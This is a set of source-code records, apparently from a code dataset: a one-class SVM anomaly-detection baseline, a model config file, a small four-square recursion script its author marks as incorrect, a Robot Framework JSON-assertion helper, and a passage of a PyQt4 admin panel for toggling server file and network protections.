else:\n        if GridSearch and kernel == 'rbf':\n\n            # use grid search cross-validation to select gamma\n            print(\"Using GridSearchCV for hyperparameter selection...\")\n\n            # sample small hold-out set from test set for hyperparameter selection. Save as val set.\n\n            n_test_set = len(X_test)\n            n_val_set = int(0.1 * n_test_set)\n            n_test_out = 0\n            n_test_norm = 0\n            n_val_out = 0\n            n_val_norm = 0\n            while (n_test_out == 0) | (n_test_norm == 0) | (n_val_out == 0) | (n_val_norm == 0):\n                perm = np.random.permutation(n_test_set)\n                X_val = X_test[perm[:n_val_set]]\n                y_val = Y_test[perm[:n_val_set]]\n                # only accept small test set if AUC can be computed on val and test set\n                n_test_out = np.sum(Y_test[perm[:n_val_set]])\n                n_test_norm = np.sum(Y_test[perm[:n_val_set]] == 0)\n                n_val_out = np.sum(Y_test[perm[n_val_set:]])\n                n_val_norm = np.sum(Y_test[perm[n_val_set:]] == 0)\n\n            X_test = X_test[perm[n_val_set:]]\n            Y_test = Y_test[perm[n_val_set:]]\n            n_val = len(y_val)\n            n_test_set = len(Y_test)\n\n            val_scores = np.zeros((len(y_val), 1))\n            test_scores = np.zeros((len(Y_test), 1))\n\n            cv_auc = 0.0\n            cv_acc = 0\n            cv_f1 = 0\n\n            g_best = 0.1\n            for gamma in np.logspace(-10, -1, num=10, base=2):\n\n                # train on selected gamma\n                cv_svm = svm.OneClassSVM(kernel='rbf', nu=nu, gamma=gamma)\n                cv_svm.fit(X_train)\n\n                # predict on small hold-out set\n                val_acc, _, _, _, val_f1_score, val_auc_roc = predict(cv_svm, X_val, y_val, kernel)\n\n                # save model if AUC on hold-out set improved\n                if val_f1_score > cv_f1:\n                    # print('gamma set to: ', g_best)\n                    ocsvm = cv_svm\n                    g_best = gamma\n                    cv_auc = val_auc_roc\n                    cv_f1 = val_f1_score\n\n            # save results of best cv run\n            # diag['val']['auc'] = cv_auc\n            # diag['val']['acc'] = cv_acc\n\n            ocsvm = svm.OneClassSVM(kernel='rbf', nu=nu, gamma=g_best)\n\n            ocsvm.fit(X_train)\n\n\n        else:\n            # if rbf-kernel, re-initialize svm with gamma minimizing the\n            # numerical error\n            if kernel == 'rbf':\n                gamma = 1 / (np.max(pairwise_distances(X_train)) ** 2)\n                # ocsvm = svm.OneClassSVM(kernel='rbf', nu=nu, gamma=gamma)\n\n            ocsvm.fit(X_train)\n\n    return ocsvm\n\n\n\ndef predict(ocsvm, X, y, kernel, **kwargs):\n\n    # reshape to 2D 
if input is tensor\n    if X.ndim > 2:\n        X_shape = X.shape\n        X = X.reshape(X_shape[0], np.prod(X_shape[1:]))\n\n    if kernel in ('DegreeKernel', 'WeightedDegreeKernel'):\n        # get_kernel_matrix(kernel=kernel, which_set=which_set, **kwargs)\n        # if which_set == 'train':\n        #     scores = (-1.0) * ocsvm.decision_function(K_train)\n        #     y_pred = (ocsvm.predict(K_train) == -1) * 1\n        # if which_set == 'test':\n        #     scores = (-1.0) * ocsvm.decision_function(K_test)\n        #     y_pred = (ocsvm.predict(K_test) == -1) * 1\n        print('unexpected behaviour')\n\n    else:\n        scores = (-1.0) * ocsvm.decision_function(X)\n        y_pred = ocsvm.predict(X)\n\n        y_pred[y_pred == 1.0] = 0.0\n        y_pred[y_pred == -1.0] = 1.0\n\n    scores_flattened = scores.flatten()\n    acc = 100.0 * sum(y == y_pred) / len(y)\n\n    TP = np.count_nonzero(y_pred * y)\n    TN = np.count_nonzero((y_pred - 1) * (y - 1))\n    FP = np.count_nonzero(y_pred * (y - 1))\n    FN = np.count_nonzero((y_pred - 1) * y)\n\n    if(TP+FP == 0):\n        prec = 0.0\n    else:\n        prec = TP/(TP + FP)\n\n    rec = TP / (TP + FN)\n    spec = TN / (TN + FP)\n\n    if(prec+rec == 0):\n        f1_score = 0.0\n    else:\n        f1_score = 2*prec*rec/(prec + rec)\n\n    # if sum(y) > 0:\n    auc_roc = roc_auc_score(y, scores.flatten())\n\n    # if which_set == 'test':\n    #     rho = -svm.intercept_[0]\n\n    return acc, prec, rec, spec, f1_score, auc_roc\n\n\ndef main(args):\n\n\n    seed = 123\n    random.seed(seed)\n    np.random.seed(seed)\n    tf.set_random_seed(seed)\n\n    K = args.K\n\n    test_tasks = load_MiniImageNet()\n\n    test_finetune_normal_indexes_list, test_finetune_anomalous_indexes_list = [], []\n    for i in range(len(test_tasks)):\n        test_finetune_normal_indexes_list.append(list(np.where(test_tasks[i]['Y_inner'] == 0)[0]))\n        test_finetune_anomalous_indexes_list.append(list(np.where(test_tasks[i]['Y_inner'] == 1)[0]))\n\n    acc_list, prec_list, rec_list, spec_list, f1_list, auc_roc_list = [], [], [], [], [], []\n\n\n    kernel = 'rbf'\n    nu = 0.1\n    GridSearch = True\n    gamma = 'scale'\n\n    n_finetune_sets = 20\n\n\n    for test_task_idx, test_task in enumerate(test_tasks):\n        normal_indexes = test_finetune_normal_indexes_list[test_task_idx]\n        anomalous_indexes = test_finetune_anomalous_indexes_list[test_task_idx]\n        for fset_idx in range(n_finetune_sets):\n            finetune_X, finetune_Y = test_task[\"X_inner\"], np.expand_dims(test_task[\"Y_inner\"], -1)\n            # sampled for the present finetune set\n            finetune_normal_idxs = random.sample(normal_indexes, K)\n            finetune_indexes = []\n\n            finetune_indexes += finetune_normal_idxs\n\n            finetune_X = finetune_X[finetune_indexes]\n            finetune_Y = finetune_Y[finetune_indexes]\n\n\n            finetune_X = finetune_X.reshape(finetune_X.shape[0], -1)\n\n            pca = PCA(0.95)\n            # print(finetune_X.shape)\n            pca.fit(finetune_X)\n            finetune_X = pca.transform(finetune_X)\n            # print(finetune_X.shape)\n            test_X = np.reshape(test_task['X_outer'], (test_task['X_outer'].shape[0], -1))\n            test_X = pca.transform(test_X)\n            ocsvm = initialize_ocsvm(kernel, nu, gamma)\n\n            ocsvm = train(ocsvm, finetune_X, test_X, np.squeeze(test_task['Y_outer']), kernel, nu, GridSearch)\n            # print('decision was made for gamma = ', ocsvm.gamma)\n            acc, prec, rec, spec, f1_score, auc_roc = predict(ocsvm, test_X, np.squeeze(test_task['Y_outer']), kernel)\n            print('test_task: ', test_task_idx,\n                  'f_set: ', fset_idx,\n                  ' acc ', acc,\n                  ' prec ', prec,\n                  ' rec ', rec,\n                  ' spec ', spec,\n                  ' f1_score ', f1_score,\n                  ' auc_roc ', auc_roc)\n\n            acc_list.append(acc)\n            prec_list.append(prec)\n            rec_list.append(rec)\n            spec_list.append(spec)\n            f1_list.append(f1_score)\n            auc_roc_list.append(auc_roc)\n\n\n    test_results_dict = {}\n    test_results_dict['acc'] = acc_list\n    test_results_dict['prec'] = prec_list\n    test_results_dict['rec'] = rec_list\n    test_results_dict['spec'] = spec_list\n    test_results_dict['f1'] = f1_list\n    test_results_dict['auc_roc'] = auc_roc_list\n\n\n    results_dir_path = './results/'\n    if (not (os.path.exists(results_dir_path))):\n        os.mkdir(results_dir_path)\n    filename = args.summary_dir + '_K_' + str(K) + '.txt'\n    with open(results_dir_path+filename, 'wb') as file:\n        pickle.dump(test_results_dict, file)\n\n\n    print('average metrics')\n\n    print(\n        ' acc : ',\n        np.mean(acc_list),\n        ' prec : ',\n        np.mean(prec_list),\n        ' recall : ',\n        np.mean(rec_list),\n        ' specificity : ',\n        np.mean(spec_list),\n        ' f1_score : ',\n        np.mean(f1_list),\n        ' auc_roc : ',\n        np.mean(auc_roc_list))\n\n    print('min metrics')\n\n    print(\n        ' acc : ',\n        np.amin(acc_list),\n        ' prec : ',\n        np.amin(prec_list),\n        ' recall : ',\n        np.amin(rec_list),\n        ' specificity : ',\n        np.amin(spec_list),\n        ' f1_score : ',\n        np.amin(f1_list),\n        ' auc_roc : ',\n        np.amin(auc_roc_list))\n\n    print('max metrics')\n\n    print(\n        ' acc : ',\n        np.amax(acc_list),\n        ' prec : ',\n        np.amax(prec_list),\n        ' recall : ',\n        np.amax(rec_list),\n        ' specificity : ',\n        np.amax(spec_list),\n        ' f1_score : ',\n        np.amax(f1_list),\n        ' auc_roc : ',\n        np.amax(auc_roc_list))\n\n    n_test_tasks = len(acc_list)\n    print('ci95 metrics - number of test tasks :', n_test_tasks)\n\n    print(\n        ' acc : ',\n        1.96*np.std(acc_list)/np.sqrt(n_test_tasks),\n        ' prec : ',\n        1.96*np.std(prec_list)/np.sqrt(n_test_tasks),\n        ' recall : ',\n        1.96*np.std(rec_list)/np.sqrt(n_test_tasks),\n        ' specificity : ',\n        1.96*np.std(spec_list)/np.sqrt(n_test_tasks),\n        ' f1_score : ',\n        1.96*np.std(f1_list)/np.sqrt(n_test_tasks),\n        ' auc_roc : ',\n        1.96*np.std(auc_roc_list)/np.sqrt(n_test_tasks)\n        )\n\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(\n        description=('supervised learning on one task (one MNIST digit) /'\n                     'purpose: benchmark with Model agnostic meta learning'\n                     ' with MNIST'))\n\n    parser.add_argument(\n        '-K',\n        type=int,\n        metavar='',\n        help='number of data points sampled for training')\n    parser.add_argument(\n        '-cir_train',\n        type=float,\n        metavar='',\n        help='percentage of positive examples')\n    parser.add_argument(\n        '-test_task_idx',\n        type=int,\n        metavar='',\n        help='index of the task to be learned')\n    parser.add_argument(\n        '-val_task_idx',\n        type=int,\n        metavar='',\n        help='index of the val task - only needed to load the dataset')\n    parser.add_argument('-config_file',\n                        type=str,\n                        default=\"None\")\n\n\n    args = parser.parse_args()\n\n    args_dict = vars(args)\n    if args.config_file != \"None\":\n        args_dict = extract_args_from_json(args.config_file, args_dict)\n\n    for key in list(args_dict.keys()):\n\n        if str(args_dict[key]).lower() == \"true\":\n            args_dict[key] = True\n        elif str(args_dict[key]).lower() == \"false\":\n            args_dict[key] = False\n\n\n    args = Bunch(args_dict)\n\n    main(args)\n","sub_path":"MAMLs_Reptiles/MiniImageNet/OCC_baselines/OCSVM/ocsvm_main.py","file_name":"ocsvm_main.py","file_ext":"py","file_size_in_byte":12621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"199383842","text":"# coding:utf-8\n# input and preprocess. 'Train' covers the complete train/evaluation/test flow; 'test' means data of exactly the same type is fed through the computation; 'predict' means the data has no labels.\ntest_keyword = ['aha']\npredict_keyword = ['testdata']\nbase = '../data/' \n\n# Sampling\nsample_rate = 5 # unit: milliseconds, >= 1\n\n# Preprocessing: PCA Gaussian FFT\nwindow_length, overlap_window = 20, 20 # window size and sliding step\ntrain_data_rate = 
0.1 # fraction of the preprocessed data actually used, to cut down the number of training samples (train/predict stage)\nsaved_dimension_after_pca, sigma = 20, 500 \nuse_gauss, use_pca, use_fft = True, False, True # True\nwhether_shuffle_train_and_test = True\n\n# Model detail \nepochs, n_splits = 50 , 10\nbatch_size, train_batch_size = 2, 2000 # essential; batch_size is actually the LSTM's N_step\n\ntest_ratio, evaluation_ratio = 0.2, 0.1 # split into train, test and validation sets\nTRAINABLE = True\nMAX_NB_VARIABLES = saved_dimension_after_pca if use_pca else window_length * 2\nunits = 50 # int(MAX_NB_VARIABLES / 2)\n\n### file-related settings are added here ###\ntrain_keyword = ['05_work_word', '06_work_excel', '07_work_ppt', '08_social_wechat', '09_social_qq', '13_game_zuma', '14_game_candy', '15_game_minecraft', '16_picture_win3d', '17_chrome_surfing', '18_firefox_surfing', '19_chrome_gmail_work', '20_chrome_twitter', '22_chrome_amazon', '23_chrome_agar']\ntrain_folder = '../data//input//apps/'\ntest_folder = '../data//input//apps/'\npredict_folder = '../data//input//apps/'\ntrain_tmp = '../data//tmp/apps//tmp/train/'\ntest_tmp = '../data//tmp/apps//tmp/test/'\npredict_tmp = '../data//tmp/apps//tmp/predict/'\ntrain_tmp_test = '../data//tmp/apps//tmp/train/test/'\nmodel_folder = '../data//tmp/apps//model/'\nNB_CLASS = 15\n","sub_path":"src V4.0 Rewrite for joint experiments/o2_config.py","file_name":"o2_config.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"167969658","text":"def lang(n):\n    if n == 0:\n        print(0)\n    else:\n        n1 = int(n**0.5)\n        if n1**2 == n:\n            print(int(n1), end=' ')\n        else:\n            lang(n - (n // n**0.5)**2)\n            print(int(n // n**0.5), sep=' ', end=' ')\n\n\nn = int(input())\nlang(n)\n","sub_path":"doneTask_04/Task21_recLangrangeiMyNotCorrect.py","file_name":"Task21_recLangrangeiMyNotCorrect.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"366456792","text":"# -*- coding:utf-8 -*-\nfrom __future__ import unicode_literals\nfrom objectpath import *\nfrom robot.api import logger\nimport json\nimport sys\nimport copy\n\n\nclass JsonValue:\n    def __init__(self):\n        self.__value_json = None\n        self._expect_json = None\n        self.__actual_json = None\n        self.base_path = \"$.\"\n\n    def _equal_field(self, path, value, value1):\n        __path = copy.deepcopy(path)\n\n        if isinstance(value, list):\n            self._get_tree_value(path)\n            for i in range(len(value)):\n                path = __path + \"[\" + str(i) + \"]\"\n                self._equal_field(path, value[i], self._tree_value)\n        elif isinstance(value, dict):\n            self._get_tree_value(path)\n            for k, v in value.iteritems():\n                path = \".\".join((__path, k))\n                self._equal_field(path, v, self._tree_value)\n        else:\n            if isinstance(value1, list):\n                if value not in value1:\n                    msg = 'JSON查询结果比较,值{0}不在list {1} 内部'.format(value, value1)\n                    self._assert_error(msg)\n            else:\n                self._get_tree_value(path)\n                if self._tree_value != value:\n                    msg = 'JSON查询结果比较:\\n路径{0}返回值为:{1},期望:{2}'.format(path, self._tree_value, value)\n                    self._assert_error(msg)\n\n    def _get_tree_value(self, path):\n\n        self._tree_value = self._tree.execute(path)\n\n    def __convert_json(self, value_str):\n\n        if isinstance(value_str, (str, unicode)):\n\n            self.__value_json = json.loads(value_str, encoding='utf-8')\n\n        elif isinstance(value_str, dict):\n\n            self.__value_json = value_str\n\n        else:\n\n            logger.error(\"期望结果的数据类型错误\")\n\n            sys.exit()\n\n    def get_result_value(self, result, path):\n        \"\"\"\n        result : 输入值 \\n\n\n        path : 期望获取的值 path \\n\n\n        example : \\n\n        result: 
{\"a\":\"b\",\"b\":[\"a\",\"b\",] , \"c\" :{\"a\":\"b\"} ,\"d\":{ \"c\":[1,2,3] } } \\n\n except result : d - c 第二个值 , 注:从 0 开始 \\n\n\n | ${x}= | get_result_value | result | d.c[2] | \\n\"\n\n \"\"\"\n # 组合 path\n path = self.base_path + path\n\n # 转换 类型\n self.__convert_json(result)\n\n result_value = Tree(self.__value_json).execute(path)\n\n return result_value\n\n def assert_equal_json(self, actual_json, expect_json):\n \"\"\"\n actual_json : 实际结果 为字符串 \\n\n expect_json : 期望结果 \\n\n example \\n\n 实际结果: {\"a\":\"b\",\"b\":[\"a\",\"b\",] , \"c\" :{\"a\":\"b\"} ,\"d\":{ \"c\":[1,2,3] } } \\n\n 若期望比较: b 中的第二个元素 值是否为 b \\n\n expect_json 写法:{\"b[1]\":\"b\"} \\n\n 若期望比较: c 中的 a 元素是否 为 b \\n\n expect_json 写法:{\"c.a\":\"b\"} \\n\n 若期望比较: d 中的 c 列表中的 第二个元素 为 3 \\n\n expect_json 写法:{\"d.c[2]\":3} \\n\n example : \\n\n\n | assert_equal_json | actual_json | expect_json | \\n\"\n\n \"\"\"\n if '{' not in expect_json and actual_json == expect_json:\n return\n\n self.__convert_json(actual_json)\n\n self.__actual_json = self.__value_json\n\n self.__convert_json(expect_json)\n\n self._expect_json = self.__value_json\n\n self._tree = Tree(self.__actual_json)\n\n for key, value in self._expect_json.iteritems():\n base_path = self.base_path + key\n\n self._equal_field(base_path, value, self._expect_json)\n\n def _assert_error(self, msg):\n\n raise AssertionError(msg)","sub_path":"Public/Libary/CommonLib/JsonValue.py","file_name":"JsonValue.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"125907422","text":"# -*- coding: utf-8 -*-\nfrom PyQt4 import QtCore, QtGui \nimport sys\nimport json\nfrom http import *\n\n\ntry:\n _fromUtf8 = QtCore.QString.fromUtf8\nexcept AttributeError:\n def _fromUtf8(s):\n return s\n\ntry:\n _encoding = QtGui.QApplication.UnicodeUTF8\n def _translate(context, text, disambig):\n return QtGui.QApplication.translate(context, text, disambig, _encoding)\nexcept AttributeError:\n def _translate(context, text, disambig):\n return QtGui.QApplication.translate(context, text, disambig)\n \nclass AdminBoardSafe(QtGui.QWidget):\n def __init__(self,parent=None):\n super(AdminBoardSafe,self).__init__(parent) \n #self.setupUi(self)\n\n def AddAdminTagSafe(self):\n self.adminTagSafeLogo = QtGui.QWidget(self.adminTagSafeBkg)\n self.adminTagSafeLogo.setGeometry(QtCore.QRect(40, 10, 70, 60))\n self.adminTagSafeLogo.setObjectName(_fromUtf8(\"adminTagSafeLogo\"))\n self.adminTagSafeLogo.setStyleSheet(_fromUtf8(\"border-image: url(:/images/admin_safe_logo.png);\"))\n\n self.adminTagSafeTitle = QtGui.QWidget(self.adminTagSafeBkg)\n self.adminTagSafeTitle.setGeometry(QtCore.QRect(120, 10, 200, 60))\n self.adminTagSafeTitle.setObjectName(_fromUtf8(\"adminTagSafeTitle\"))\n self.adminTagSafeTitle.setStyleSheet(_fromUtf8(\"border-image: url(:/images/admin_safe_title.png);\"))\n \n self.adminTagSafeSpace1 = QtGui.QWidget(self.adminTagSafeBkg)\n self.adminTagSafeSpace1.setGeometry(QtCore.QRect(0, 74, 10000, 1))\n self.adminTagSafeSpace1.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_bg_disable.png);\"))\n self.adminTagSafeSpace1.setObjectName(_fromUtf8(\"adminTagSafeSpace1\"))\n\n self.adminTagSafeSpace2 = QtGui.QWidget(self.adminTagSafeBkg)\n self.adminTagSafeSpace2.setGeometry(QtCore.QRect(0, 112, 10000, 1))\n self.adminTagSafeSpace2.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_bg_disable.png);\"))\n self.adminTagSafeSpace2.setObjectName(_fromUtf8(\"adminTagSafeSpace2\"))\n\n 
self.adminTagSafeModeTxet = QtGui.QLabel(self.adminTagSafeBkg)\n self.adminTagSafeModeTxet.setGeometry(QtCore.QRect(40, 80, 91, 30))\n self.adminTagSafeModeTxet.setObjectName(_fromUtf8(\"adminTagSafeModeTxet\")) \n self.adminTagSafeModeTxet.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_no_frame.png);\"))\n self.adminTagSafeModeTxet.setText(_translate(\"adminTagSafeModeTxet\", \"当前模式\", None))\n self.adminTagSafeModeTxet.setAlignment(QtCore.Qt.AlignVCenter | QtCore.Qt.AlignCenter)\n\n # 当前模式\n self.adminTagSafeMode = QtGui.QPushButton(self.adminTagSafeBkg)\n self.adminTagSafeMode.setGeometry(QtCore.QRect(140, 80, 140, 30))\n self.adminTagSafeMode.setObjectName(_fromUtf8(\"adminTagSafeMode\")) \n self.adminTagSafeMode.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_mode_off.png);\"))\n self.adminTagSafeMode.setText(_translate(\"adminTagSafeMode\", \"\", None))\n \n # 应用到服务器\n self.adminTagSafeOk = QtGui.QPushButton(self.adminTagSafeBkg)\n self.adminTagSafeOk.setGeometry(QtCore.QRect(800, 78, 140, 30))\n self.adminTagSafeOk.setObjectName(_fromUtf8(\"adminTagSafeOk\")) \n self.adminTagSafeOk.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_grey_line.png);\"))\n self.adminTagSafeOk.setText(_translate(\"adminTagSafeOk\", \"应用到服务器\", None))\n\n self.adminTagSafeCount = 7\n self.adminTagSafeTable = QtGui.QTableWidget(self.adminTagSafeBkg)\n self.adminTagSafeTable.setGeometry(QtCore.QRect(25, 122, 950, 290))\n self.adminTagSafeTable.setObjectName(_fromUtf8(\"specrc_list_widget\"))\n self.adminTagSafeTable.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_grey_line.jpg);\"))\n self.adminTagSafeTable.verticalHeader().setVisible(False)\n self.adminTagSafeTable.setEditTriggers(QtGui.QTableWidget.NoEditTriggers)\n self.adminTagSafeTable.setAlternatingRowColors(True)\n #list_widget.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)\n self.adminTagSafeTable.setRowCount(self.adminTagSafeCount)\n self.adminTagSafeTable.setColumnCount(4)\n self.adminTagSafeTable.setHorizontalHeaderLabels([_fromUtf8(\"功能\"),_fromUtf8(\"模式\"),_fromUtf8(\"状态\"),_fromUtf8(\"操作\")])\n self.adminTagSafeTable.setShowGrid(False)\n self.adminTagSafeTable.setColumnWidth(0, 280)\n self.adminTagSafeTable.setColumnWidth(1, 160)\n self.adminTagSafeTable.setColumnWidth(2, 260)\n self.adminTagSafeTable.setColumnWidth(3, 225)\n for i in range(0, self.adminTagSafeCount):\n self.adminTagSafeTable.setRowHeight(i, 50)\n \n self.adminTagSafeFileEtcModeText, self.adminTagSafeFileEtcOnOff, self.adminTagSafeFileEtcText = self.AddAdminTagSafeTableItem(\\\n self.adminTagSafeTable, 0, '/images/admin_safe_etc.png', '禁止修改系统配置','维护模式',\\\n '/images/btn_close_1.png','已应用到服务器')\n self.adminTagSafeFileLibModeText, self.adminTagSafeFileLibOnOff, self.adminTagSafeFileLibText = self.AddAdminTagSafeTableItem(\\\n self.adminTagSafeTable, 1, '/images/admin_safe_lib.png', '禁止修改系统库文件','维护模式',\\\n '/images/btn_close_1.png','已应用到服务器')\n self.adminTagSafeFileBinModeText, self.adminTagSafeFileBinOnOff, self.adminTagSafeFileBinText = self.AddAdminTagSafeTableItem(\\\n self.adminTagSafeTable, 2, '/images/admin_safe_bin.png', '禁止修改系统程序文件','维护模式',\\\n '/images/btn_close_1.png','已应用到服务器')\n #self.adminTagSafeFileBootModeText, self.adminTagSafeFileBootOnOff, self.adminTagSafeFileBootText = self.AddAdminTagSafeTableItem(\\\n # self.adminTagSafeTable, 3, '/images/admin_safe_boot.png', '禁止修改系统启动文件','维护模式',\\\n # '/images/btn_close_1.png','已应用到服务器')\n self.adminTagSafeNetFtpModeText, self.adminTagSafeNetFtpOnOff, 
self.adminTagSafeNetFtpText = self.AddAdminTagSafeTableItem(\\\n self.adminTagSafeTable, 3, '/images/admin_safe_ftp.png', '禁止FTP访问','维护模式',\\\n '/images/btn_close_1.png','已应用到服务器')\n self.adminTagSafeNetTelnetModeText, self.adminTagSafeNetTelnetOnOff, self.adminTagSafeNetTelnetText = self.AddAdminTagSafeTableItem(\\\n self.adminTagSafeTable, 4, '/images/admin_safe_telnet.png', '禁止Telnet访问','维护模式',\\\n '/images/btn_close_1.png','已应用到服务器')\n self.adminTagSafeNetMailModeText, self.adminTagSafeNetMailOnOff, self.adminTagSafeNetMailText = self.AddAdminTagSafeTableItem(\\\n self.adminTagSafeTable, 5, '/images/admin_safe_email.png', '禁止POP/SMTP访问','维护模式',\\\n '/images/btn_close_1.png','已应用到服务器')\n self.adminTagSafeNetWebModeText, self.adminTagSafeNetWebOnOff, self.adminTagSafeNetWebText = self.AddAdminTagSafeTableItem(\\\n self.adminTagSafeTable, 6, '/images/admin_safe_web.png', '禁止HTTP访问','维护模式',\\\n '/images/btn_close_1.png','已应用到服务器')\n\n # 变量 - 安全保护\n self.adminTagSafeModeValue = 0\n self.adminTagSafeFileEtcValue = 0\n self.adminTagSafeFileLibValue = 0\n self.adminTagSafeFileBinValue = 0\n self.adminTagSafeFileBootValue = 0\n self.adminTagSafeNetFtpValue = 0\n self.adminTagSafeNetTelnetValue = 0\n self.adminTagSafeNetMailValue = 0\n self.adminTagSafeNetWebValue = 0\n\n # 获取Safe设置状态\n self.AdminSafeGetStatus()\n\n # 消息 - 标签 - 安全页\n self.connect(self.adminTagSafeMode, QtCore.SIGNAL(\"clicked()\"), self.onAdminTagSafeModeClick)\n self.connect(self.adminTagSafeTable, QtCore.SIGNAL(\"cellClicked(int,int)\"), self.onAdminTagSafeTableClick)\n self.connect(self.adminTagSafeOk, QtCore.SIGNAL(\"clicked()\"), self.onAdminTagSafeSet)\n\n\n def AddAdminTagSafeTableItem(self, tableHandle, line,\\\n c1_logoImg, c1_logoText,\\\n c2_modeText,\\\n c3_onoffImg,\\\n c4_statusText):\n # c1\n item = QtGui.QWidget()\n item.setGeometry(QtCore.QRect(0, 0, 200, 50))\n img = QtGui.QLabel(item)\n img.setGeometry(QtCore.QRect(40, 0, 45, 45))\n img.setAlignment(QtCore.Qt.AlignRight)\n img.setStyleSheet(_fromUtf8(\"image: url(:%s);\" % (c1_logoImg)))\n text = QtGui.QLabel(item)\n text.setGeometry(QtCore.QRect(120, 0, 150, 50))\n text.setAlignment(QtCore.Qt.AlignVCenter | QtCore.Qt.AlignLeft)\n text.setText(_fromUtf8(\"%s\" % (c1_logoText)))\n tableHandle.setCellWidget(line, 0, item)\n \n # c2\n item = QtGui.QTableWidgetItem(_fromUtf8(c2_modeText))\n item.setTextAlignment(QtCore.Qt.AlignCenter)\n tableHandle.setItem(line, 1, item)\n c2_modeHandle = item\n \n # 2行 3列\n item = QtGui.QWidget()\n item.setGeometry(QtCore.QRect(0, 0, 260, 50))\n img = QtGui.QLabel(item)\n img.setGeometry(QtCore.QRect(55, 10, 150, 30))\n img.setAlignment(QtCore.Qt.AlignVCenter | QtCore.Qt.AlignLeft)\n img.setStyleSheet(_fromUtf8(\"border-image: url(:%s);\"%(c3_onoffImg)))\n tableHandle.setCellWidget(line, 2, item)\n c3_onoffHandle = img\n\n # 2行 4列\n item = QtGui.QTableWidgetItem(_fromUtf8(c4_statusText))\n item.setTextAlignment(QtCore.Qt.AlignCenter)\n tableHandle.setItem(line, 3, item)\n c4_statusHandle = item\n \n return [c2_modeHandle, c3_onoffHandle, c4_statusHandle]\n\n def onAdminTagSafeModeClick(self):\n if self.adminTagSafeModeValue == 0:\n self.adminTagSafeModeValue = 1\n self.adminTagSafeMode.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_mode_on.png);\"))\n else: \n self.adminTagSafeModeValue = 0\n self.adminTagSafeMode.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_mode_off.png);\"))\n\n def onAdminTagSafeTableClick(self, line, col): \n if line == 0 and col == 2:\n if self.adminTagSafeFileEtcValue == 0:\n 
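# toggle the system-config protection flag; the status column shows a pending message until the change is applied to the server\n                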
self.adminTagSafeFileEtcValue = 1\n self.adminTagSafeFileEtcText.setText(_fromUtf8(\"等待应用到服务器\"))\n self.adminTagSafeFileEtcOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n else:\n self.adminTagSafeFileEtcValue = 0\n self.adminTagSafeFileEtcText.setText(_fromUtf8(\"等待应用到服务器\"))\n self.adminTagSafeFileEtcOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\"))\n elif line == 1 and col == 2:\n if self.adminTagSafeFileLibValue == 0:\n self.adminTagSafeFileLibValue = 1\n self.adminTagSafeFileLibText.setText(_fromUtf8(\"等待应用到服务器\"))\n self.adminTagSafeFileLibOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n else:\n self.adminTagSafeFileLibValue = 0\n self.adminTagSafeFileLibText.setText(_fromUtf8(\"等待应用到服务器\"))\n self.adminTagSafeFileLibOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\"))\n elif line == 2 and col == 2:\n if self.adminTagSafeFileBinValue == 0:\n self.adminTagSafeFileBinValue = 1\n self.adminTagSafeFileBinText.setText(_fromUtf8(\"等待应用到服务器\"))\n self.adminTagSafeFileBinOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n else:\n self.adminTagSafeFileBinValue = 0\n self.adminTagSafeFileBinText.setText(_fromUtf8(\"等待应用到服务器\"))\n self.adminTagSafeFileBinOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\")) \n #elif line == 3 and col == 2:\n # if self.adminTagSafeFileBootValue == 0:\n # self.adminTagSafeFileBootValue = 1\n # self.adminTagSafeFileBootText.setText(_fromUtf8(\"等待应用到服务器\"))\n # self.adminTagSafeFileBootOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n # else:\n # self.adminTagSafeFileBootValue = 0\n # self.adminTagSafeFileBootText.setText(_fromUtf8(\"等待应用到服务器\"))\n # self.adminTagSafeFileBootOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\"))\n elif line == 3 and col == 2:\n if self.adminTagSafeNetFtpValue == 0:\n self.adminTagSafeNetFtpValue = 1\n self.adminTagSafeNetFtpText.setText(_fromUtf8(\"等待应用到服务器\"))\n self.adminTagSafeNetFtpOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n else:\n self.adminTagSafeNetFtpValue = 0\n self.adminTagSafeNetFtpText.setText(_fromUtf8(\"等待应用到服务器\"))\n self.adminTagSafeNetFtpOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\"))\n elif line == 4 and col == 2:\n if self.adminTagSafeNetTelnetValue == 0:\n self.adminTagSafeNetTelnetValue = 1\n self.adminTagSafeNetTelnetText.setText(_fromUtf8(\"等待应用到服务器\"))\n self.adminTagSafeNetTelnetOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n else:\n self.adminTagSafeNetTelnetValue = 0\n self.adminTagSafeNetTelnetText.setText(_fromUtf8(\"等待应用到服务器\"))\n self.adminTagSafeNetTelnetOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\"))\n elif line == 5 and col == 2:\n if self.adminTagSafeNetMailValue 